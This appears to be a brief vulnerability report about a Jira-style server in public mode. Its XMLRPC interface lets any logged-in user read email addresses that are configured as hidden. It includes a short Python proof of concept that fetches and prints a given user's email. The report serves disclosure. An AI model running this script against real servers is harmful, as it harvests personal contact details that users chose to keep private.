Server is set in public mode. The configuration option for email is set to hidden.
The XMLRPC interface is enabled for authenticated users.

It is trivial to find a users email.

Concept python code follows:

#!/usr/bin/python

import xmlrpclib
import sys

s = xmlrpclib.ServerProxy('http://myhostname.fqdn/rpc/xmlrpc')
auth = s.jira1.login('username', 'password')

user = s.jira1.getUser(auth, sys.argv[1])
print "Email address of " + sys.argv[1] + " is " + user['email']